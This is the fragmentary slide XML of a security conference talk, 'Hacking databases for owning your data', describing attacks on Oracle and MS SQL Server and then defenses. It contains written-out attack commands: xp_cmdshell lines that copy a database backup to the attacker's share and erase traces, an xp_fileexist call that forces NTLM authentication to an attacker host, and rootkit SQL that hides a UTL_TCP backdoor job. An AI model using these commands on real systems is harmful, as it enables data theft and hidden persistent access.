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41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-360" y="-6007320"/>
            <a:ext cx="360" cy="133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-6006960"/>
            <a:ext cx="1440" cy="1340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-6006960"/>
            <a:ext cx="1440" cy="1340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-6006960"/>
            <a:ext cx="1440" cy="1340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-6006960"/>
            <a:ext cx="1440" cy="1340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-6006960"/>
            <a:ext cx="1440" cy="1340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-6006960"/>
            <a:ext cx="1440" cy="1340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-6006960"/>
            <a:ext cx="1440" cy="133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90720" y="303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356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40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66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4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40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66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400" y="522000"/>
            <a:ext cx="775656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40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166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14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40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166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71400" y="522000"/>
            <a:ext cx="775656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40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66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714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40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66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71400" y="522000"/>
            <a:ext cx="775656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40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16600" y="190656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14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40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16600" y="4147920"/>
            <a:ext cx="249732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1400" y="522000"/>
            <a:ext cx="775656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6160" y="414792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6160" y="1906560"/>
            <a:ext cx="378504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400" y="4147920"/>
            <a:ext cx="7756560" cy="20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7704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7704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594360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3116160"/>
            <a:ext cx="9144000" cy="3733920"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 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5935680"/>
            <a:ext cx="152280" cy="76320"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2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219320" y="2362320"/>
            <a:ext cx="7354800" cy="1411200"/>
            <a:chOff x="1219320" y="2362320"/>
            <a:chExt cx="7354800" cy="1411200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219320" y="2362320"/>
              <a:ext cx="7354800" cy="141120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19320" y="2710080"/>
              <a:ext cx="73548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title styl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217520" y="4210200"/>
            <a:ext cx="7344000" cy="547200"/>
            <a:chOff x="1217520" y="4210200"/>
            <a:chExt cx="7344000" cy="547200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1217520" y="4267080"/>
              <a:ext cx="7344000" cy="4222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7520" y="4210200"/>
              <a:ext cx="73440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edit Master subtitle sty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19320" y="1752480"/>
            <a:ext cx="7343640" cy="441360"/>
            <a:chOff x="1219320" y="1752480"/>
            <a:chExt cx="7343640" cy="441360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219320" y="1752480"/>
              <a:ext cx="7343640" cy="41940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19320" y="1752480"/>
              <a:ext cx="7343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riefing f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2236680" cy="86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67720" cy="12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67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3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75656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9052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5560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452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17316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816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0816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0816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522000"/>
            <a:ext cx="775656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56560" cy="429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80880" indent="-29052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-25560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452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17316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816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0816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08160" indent="-193680">
              <a:lnSpc>
                <a:spcPct val="4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14240" y="2306520"/>
            <a:ext cx="7745400" cy="1293840"/>
            <a:chOff x="714240" y="2306520"/>
            <a:chExt cx="7745400" cy="1293840"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="203" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="714240" y="2306520"/>
              <a:ext cx="7745400" cy="129384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4240" y="2373120"/>
              <a:ext cx="774540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lnSpc>
                  <a:spcPct val="93000"/>
                </a:lnSpc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000" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="333333"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                </a:rPr>
                <a:t>Hacking databases for owning your dat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22160" y="4903920"/>
            <a:ext cx="7390080" cy="1457640"/>
            <a:chOff x="722160" y="4903920"/>
            <a:chExt cx="7390080" cy="1457640"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="206" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="722160" y="4903920"/>
              <a:ext cx="7390080" cy="11430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160" y="4903920"/>
              <a:ext cx="7390080" cy="14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333333"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="MS Gothic"/>
                </a:rPr>
                <a:t>Cesar Cerru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algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="93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333333"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="MS Gothic"/>
                </a:rPr>
                <a:t>Esteban Martinez Fay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algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="92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333333"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="MS Gothic"/>
                </a:rPr>
                <a:t>Argeniss (www.argeniss.co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09520" y="165240"/>
            <a:ext cx="3470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Why Database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9120" y="1701720"/>
            <a:ext cx="82296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meter defense is not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atabases have many entry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eb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tern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Partner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f the OSs and the networks are properly secured, databases still could b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Misconfigu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Have weak passw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Vulnerable to known/unknown vulnera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databases are hack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8229600" cy="44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assword guessing/brutefor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f passwords are blank or not strong they can be easily guessed/brutefor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fter a valid user account is found is easy to complete compromise the database, especially if the database is Ora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asswords and data sniffed over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f encryption is not used, passwords and data can be sniff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xploiting mis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ome database servers are ope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ots of functionality enabled and sometimes insecurely config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databases are hack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50600"/>
            <a:ext cx="8559720" cy="45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livering a Troj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y email, p2p, IM, CD, DVD, pen driv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nce exec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Get database servers and login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DBC, OLEDB, JDBC configured connections, Sniff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nect to database servers (try default accounts if necess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teal data (run 0day and install rootkit if necess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d next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ooking at linked servers/data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ooking at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niff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end encrypted data back to attacker by email, HTTPS, covert channe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databases are hack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50960"/>
            <a:ext cx="85597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xploiting known/unknown vulner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uffer overf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QL Inj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xploiting SQL Injection on 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atabases can be hacked from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Firewalls are complete bypa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is is one of the easiest and preferred method that criminals use to steal sensitive information such as credit cards, social security numbers, customer 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databases are hack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9040" y="1652760"/>
            <a:ext cx="864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isks and backup ta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f data files and backed up data are not encrypted, once stolen data can be comprom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siders are a major thre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f they can log in then they can hack the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stalling a rootkit/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ctions and database objects can be hid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signed to steal data and send it to attacker and/or to give the attacker stealth and unrestricted access at any given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1765080"/>
            <a:ext cx="8229600" cy="46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ive Oracle Database h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ealing data using a rootkit and backdo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dvanced Oracle explo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ealing a complete database from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280" y="1800360"/>
            <a:ext cx="8370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fter an Oracle Database is compromised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ttacker can install a backd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 enable him/her to execute commands/queries on the Database and get the responses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 rootkit can be used to hide the backdoor from the DB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e backdoor is built in PL/SQL or Ja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Uses built-in network functionality to open a connection to the attacker’s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ads the connection and execute the commands the attacker s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rite to the opened connection the output of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848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e backdoor can be scheduled to run periodically so if the connection is lost, the attacker can connect at a later time and keep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e backdoor can be reconfigured (what address/port to connect, what intervals to run, etc.) by the attacker using the backdoor itsel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ttacker-Backdoor communication can be encrypted to avoid detection by I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2848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racle backdoor kit consists of two par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cripts to be run in Oracle Database ser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racleRootkit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racleBackdoor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ackdoor Console (application with a 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end commands to the backdoor and receive th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View information about the deployed back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figure the back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Manage multiple backdo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5200" y="1707840"/>
            <a:ext cx="8190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5548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6000" y="2328840"/>
            <a:ext cx="2094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Backdoor Conso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0920" y="2698920"/>
            <a:ext cx="2950920" cy="2517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02200" y="2421000"/>
            <a:ext cx="303048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Listen on TCP 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New owned DB is display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Send com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Command output is display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5280" y="3068640"/>
            <a:ext cx="28656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Send Info about owned D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Command is execu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Send Outp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5291280"/>
            <a:ext cx="248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Attacker host (remo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406680" y="3357720"/>
            <a:ext cx="3409920" cy="61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4292640"/>
            <a:ext cx="324000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63400" y="5219640"/>
            <a:ext cx="3589560" cy="441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77080" y="547704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77080" y="540396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77080" y="5332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77080" y="526104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77080" y="518796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511668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77080" y="504504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497196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490068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482904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77080" y="475632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468468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77080" y="461340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4540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446868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77080" y="439596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77080" y="4324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77080" y="425304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17996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77080" y="4108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403704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77080" y="396396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77080" y="389268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7080" y="382104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77080" y="374796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367668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7080" y="360360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7080" y="353232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77080" y="346068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77080" y="338760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7080" y="3316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77080" y="324468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317196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77080" y="3100320"/>
            <a:ext cx="2014560" cy="216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3029040"/>
            <a:ext cx="2014560" cy="215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50160" y="2349360"/>
            <a:ext cx="1875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Oracle Data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791040" y="4005360"/>
            <a:ext cx="314280" cy="2233440"/>
            <a:chOff x="6791040" y="4005360"/>
            <a:chExt cx="314280" cy="2233440"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="293" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6804000" y="4005360"/>
              <a:ext cx="289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3080" y="4005360"/>
              <a:ext cx="144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791040" y="6237360"/>
              <a:ext cx="314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088400" y="5775480"/>
            <a:ext cx="1803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Loop until “EXIT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is receiv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72680"/>
            <a:ext cx="83851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8640" y="180180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roductio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Why database secur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ow databases are hack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racle Database Server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15552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520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Rootkit - OracleRootkit.sq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Modify Views DBA_JOBS, DBA_JOBS_RUNNING, KU$_JOB_VIEW to hide the backdoor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5878440" cy="2047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474920" y="6021360"/>
            <a:ext cx="167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ootkit add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7280" y="5229360"/>
            <a:ext cx="534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Lucida Console"/>
              </a:rPr>
              <a:t>WHERE J.WHAT NOT LIKE 'DECLARE L_CN UTL_TCP.CONNECTION;%'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908000" y="5648040"/>
            <a:ext cx="14292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2848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racleBackdoor.sql – Backdoor insta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ubmit a job that reads commands from the attacker host, execute them and send th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leanOracleBackdoor.sql - Uninstall the Backd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moves all the Database Job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'DECLARE L_CN UTL_TCP.CONNECTION;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leanOracleRootkit.sql - Uninstall the Rootk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stores the Data Dictionary Views related to Jobs to its origin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dvanced Oracle explo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racle has a lot of functionality that can be ab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nce a Database Server is compromised, an Attacker can do whatever he w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e have built advanced exploits to hack Oracle servers with a couple of clic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520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a complete database from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480000">
            <a:off x="3564720" y="3481200"/>
            <a:ext cx="202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Export_and_zip.sq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840" y="2565360"/>
            <a:ext cx="248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Attacker host (remo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84720" y="3029040"/>
            <a:ext cx="2806920" cy="3279600"/>
            <a:chOff x="6084720" y="3029040"/>
            <a:chExt cx="2806920" cy="3279600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="312" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6084720" y="60498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84720" y="59641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84720" y="58770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84720" y="579132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84720" y="570564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84720" y="56181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84720" y="55324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4720" y="54468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4720" y="53578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84720" y="52736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84720" y="51879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84720" y="51004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84720" y="50148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4720" y="49291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84720" y="484200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84720" y="47545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4720" y="46688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4720" y="45813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84720" y="44974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84720" y="44085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432288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4720" y="42386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84720" y="41497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84720" y="40640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84720" y="39783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84720" y="38908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4720" y="38052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84720" y="371808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4720" y="36320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4720" y="35463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4720" y="34592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4720" y="337356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4720" y="328788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4720" y="32004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4720" y="31147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84720" y="30290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518160" y="2349360"/>
            <a:ext cx="1875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Oracle Data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4720" y="3573360"/>
            <a:ext cx="280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Create a parameter file for exp utility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full=y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userid="/ as sysdba"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file=export.dmp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Run the exp ut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Compress exported file with a Zip ut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3213000"/>
            <a:ext cx="2808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480000">
            <a:off x="3358080" y="3005280"/>
            <a:ext cx="280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Using a backdoor or explo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88960" y="2879640"/>
          <a:ext cx="2830680" cy="23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960" y="2879640"/>
                    <a:ext cx="283068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Oracle Database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2848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a complete database from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480000">
            <a:off x="3781440" y="3416400"/>
            <a:ext cx="138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send_zip.sq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084720" y="3029040"/>
            <a:ext cx="2806920" cy="3279600"/>
            <a:chOff x="6084720" y="3029040"/>
            <a:chExt cx="2806920" cy="3279600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="358" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6084720" y="60498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84720" y="59641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84720" y="58770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84720" y="579132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84720" y="570564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84720" y="56181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84720" y="55324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4720" y="54468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4720" y="53578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4720" y="52736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84720" y="51879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4720" y="51004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84720" y="50148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84720" y="49291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4720" y="484200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84720" y="47545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84720" y="46688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4720" y="45813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84720" y="44974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84720" y="44085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84720" y="432288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84720" y="42386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84720" y="41497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84720" y="40640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84720" y="39783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84720" y="389088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4720" y="38052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4720" y="371808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84720" y="36320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84720" y="354636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84720" y="34592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84720" y="337356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84720" y="3287880"/>
              <a:ext cx="2806920" cy="258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84720" y="320040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84720" y="311472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84720" y="3029040"/>
              <a:ext cx="2806920" cy="2588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518160" y="2349360"/>
            <a:ext cx="1875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Oracle Data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84720" y="3573360"/>
            <a:ext cx="2808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Send exported file to the attacker machine using Ja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19640" y="3213000"/>
            <a:ext cx="2808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480000">
            <a:off x="3358080" y="3005280"/>
            <a:ext cx="280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Using a backdoor or explo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1120000">
            <a:off x="3996000" y="4276440"/>
            <a:ext cx="156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Using TCP/T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1120000">
            <a:off x="4271040" y="4665240"/>
            <a:ext cx="111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333333"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>export.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7840" y="2565360"/>
            <a:ext cx="248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333333"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Attacker host (remo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588960" y="2803680"/>
          <a:ext cx="2830680" cy="24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960" y="2803680"/>
                    <a:ext cx="28306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 flipH="1">
            <a:off x="3263760" y="4437000"/>
            <a:ext cx="268920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81040" y="1765080"/>
            <a:ext cx="8229600" cy="46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ive MS SQL Server Database h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ealing a complete database from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ealing data from Internet with a couple of clic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ealing SQL Server account credentials and use them to connect back to SQL Ser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ealing data using a rootkit and backdo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1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766880"/>
            <a:ext cx="8461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a complete database from Intern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ackup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BACKUP DATABASE databasename TO DISK ='c:\windows\temp\out.da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ompress the file (you don't want a 2gb fi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EXEC xp_cmdshell 'makecab c:\windows\temp\out.dat c:\windows\temp\out.cab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et the backup by copying it to your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EXEC xp_cmdshell 'copy c:\windows\temp\out.cab \\yourIP\share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--Or by any other way (tftp, ftp, http, emai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rase th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EXEC xp_cmdshell 'del c:\windows\temp\out.dat c:\windows\temp\out.cab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1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48920" y="1800360"/>
            <a:ext cx="85518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from Internet with a couple of cl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ataThief t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ld (2002) PoC tool but still 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xploits SQL Inj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orks even if you can't get results nor errors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Makes attacked web application backend SQL Server connect to the attacker SQL Server and copy availabl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No needs of elevated privi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1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31640" y="1728360"/>
            <a:ext cx="85680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SQL Server account credentials and use them to connect back to SQL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QL Server supports Windows NTLM authent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NTLM challenge response mechanism is vulnerable to MITM att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y default all Windows versions use a weak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e can force SQL Server connect to us and try to authent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xec master.dbo.xp_fileexist '\\OurIP\share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t will try to authenticate as its service account which has sysadmin privi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e can use SQL Server credentials to connect back to SQL Server as sysadm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No need of elevated privile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1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1914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SQL Server account credentials and use them to connect back to SQL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asic NTML authentication sch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lient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      connects      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lient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ends challeng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lient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ends response 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lient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  authenticates   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820404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By one estimate, 53 million people have had data about themselves exposed over the past 13 months.  (InformationWeek, 03/20/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is is old news, right now the number is &gt; 100 million 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ata theft is becoming a major thre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riminals have identified where the gold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 the last year many databases from fortune 500 companies were compromi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s we will see compromising databases is not big deal if they haven't been properly secu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1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728720"/>
            <a:ext cx="8191440" cy="46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SQL Server account credentials and use them to connect back to SQL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QL Server NTLM authentication MITM at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6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Attacker)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 (SQL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) Cli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    connect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) Cli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ends challenge (c)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1) Client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forces to connect   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2) Cli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    connects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3) Client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sends challeng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c)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4) Cli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sends response (r)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) Cli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ends respons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) Cli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  authenticates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6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1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9640" y="1728720"/>
            <a:ext cx="81914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e can insert a backdoor by creating a SQL Server Job and scheduling it to connect to us at any given time, allowing us to execute any command and get the results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VBScript is used to connect to attacker using HTTP, HTTPS can be used to bypass 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ttacker uses Netcat and send commands on Date HTTP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QLBackdoor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9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MS SQL Server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28480" y="1708200"/>
            <a:ext cx="819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ealing data using a rootkit and back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e can hide the backdoor installing a simple SQL Server rootkit to avoid detection by database administ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ystem views are modified to not display the job and the schedule created by back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QLServerRootkit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hen needed rootkit and backdoor can be remo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leanSQLRootkit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leanSQLBackdoor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93640" y="176508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et a good password pol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rong passw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ducate users to use passphr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No password re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Login lockdown after x failed logins attem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Keep up to date with security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lways test them for some time on non production servers first and monitor for patch problems on mailing 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ometimes they could open holes instead of fix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30360" y="18014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t firewal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llow connections only from trusted h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lock all non used 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lock all outbound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hy the database would need to connect to a host or Intern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et exceptions for replication, linked databas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isable all non used funct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Use hardening guides from trusted parties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Remember to test on non production servers fir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8190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Use encry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t network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SL, database proprietary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t fil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le and File System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ackups, Data fil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t databas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lumn level encry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Databases encryption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rd party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68160" y="17254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odically check for object and system per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heck views, stored procedures, tables, etc. per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heck file, folder, registry, etc. per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odically check for new database instal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ird party products can install database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New servers could be installed with blank or weak pass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odically check for users with database administration privile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is helps to detect intrusions, elevation of privileg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odically check for database configuration and sett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6600" y="1743120"/>
            <a:ext cx="82296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odically check database system objects against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Helps to detect rootk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odically audit your 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QL Inj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Misconfigu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er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n web applications use low privileged users to connect to database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f vulnerable to SQL Injection, attacks could be lim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6600" y="1704960"/>
            <a:ext cx="82296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un database services under low privileged accou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f database services are compromised then OS compromise could be a bit diffic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og as much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eriodically check logs for events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ailed log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correct SQL syn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Permissions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onitor user activ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onitor user acce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45760" y="1676520"/>
            <a:ext cx="8458200" cy="47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Build a database server honey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Helps to detect and prevent internal and external attac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Usually attackers will go first for the low hanging fr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et up an isolated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ll outbound connections should be blo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et it to log everything, run traces and set ale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et up other services to create a realistic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et blank or easily guessable pass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Make the server looks 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You can link it from production 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et it an interesting name like CreditCardServer, SalaryServ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reate databases with names like CreditCards, CustomersInf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reate tables with fake data that seems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866960" y="1397160"/>
            <a:ext cx="5156280" cy="50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45760" y="1676160"/>
            <a:ext cx="84582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Build a home made IDS/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On sensitive Database Servers depending on available functionality you can set alerts to get notifications or to perform some actions when some errors occu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Failed login attem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ncorrect SQL synta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UNION statement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ermissions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How to protect against att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6600" y="1743120"/>
            <a:ext cx="82296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rotect your data as you protect your money!!!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hink about it, if you lose data you lose mon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Use third party tools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ncry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Vulnerability assess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ud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Monitoring, Intrusion preven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rain IT staff on database secu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sk us for professional services :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6600" y="1669680"/>
            <a:ext cx="822960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s we just saw Data Theft threat is real and database security is very impor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ne simple mistake can lead to database comprom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erimeter defense is not enoug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You must protect your databases and you have to invest on database prot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f you don't protect your databases sooner or later you will get hac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30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is means lot of money l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30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In worst case running out of busin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8418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 Chronology of Data Breaches Reported Since the ChoicePoint In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privacyrights.org/ar/ChronDataBreache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he high cost of data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informationweek.com/security/showArticle.jhtml?articleID=183700367&amp;pgno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wipe toolkit calcul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turbulence.org/Works/swipe/calculato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ow much are your personal details wor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bankrate.com/brm/news/pf/20060221b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30080" y="1765080"/>
            <a:ext cx="8202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ecurity &amp; Privacy - Made Simpl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bbb.org/securityandprivacy/SecurityPrivacyMadeSimpler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NTLM unsa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isecpartners.com/documents/NTLM_Unsaf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anipulating MS SQL Server using SQL In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appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injec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apers, advisories and explo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http://www.argeniss.com/researc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97000"/>
            <a:ext cx="82328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32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5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95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Th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Contact: cesar&gt;at&lt;argeniss&gt;dot&lt;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33333"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Argeniss – Information Sec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2000"/>
              </a:lnSpc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http://www.argenis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73160" y="149400"/>
            <a:ext cx="34700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1765080"/>
            <a:ext cx="85312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Want to be more scar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hronology of Data Bre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http://www.privacyrights.org/ar/ChronDataBreaches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ome estimated money lo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hoicePoint: $15 mill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B.J.'s Wholesale: $10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cxiom: $8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rovidence Health System: $9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026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66040" y="4495680"/>
            <a:ext cx="18414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233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69048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42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  <a:ea typeface="MS Gothic"/>
              </a:rPr>
              <a:t>   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  <a:ea typeface="MS Gothic"/>
              </a:rPr>
              <a:t>Open market pricing of personal data from Swipe Toolk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031840" y="2070000"/>
            <a:ext cx="5042160" cy="4438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9680" y="1641600"/>
            <a:ext cx="882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233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69048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428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MS Gothic"/>
              </a:rPr>
              <a:t>How much personal data wort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9240"/>
            <a:ext cx="8385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Why Database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7004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atabases are were your most valuable data r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orporat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ustomer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Financi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f your databases don't work then your company won't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ry to do a quick estimation of how much money you will lose if your databases don't work for a couple of hours, a day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f your databases are hacked then your company can run out of business or you can lose mill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040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Why Database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82044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You must comply with regulations, law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arbanes Oxley (SO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Payment Card Industry (PCI) Data Security Stand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Healthcare Services (HIPAA)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Financial Services (GLBA)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California Senate Bill No. 1386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ata Accountability and Trust Act (DA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385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Why Database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4680" y="17665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atabase vulnerabilities affect all database vend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ome vendors (like Oracle) are more affected tha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3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n 2006 Oracle released 4 Critical Patch Updates related to database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Fixed more than 20 remote vulnerabilities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n 2007 there are still &gt; 50 unpatched vulnerabilities on Oracle Database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No matter if your server is up to date with patches, it still can be easily hack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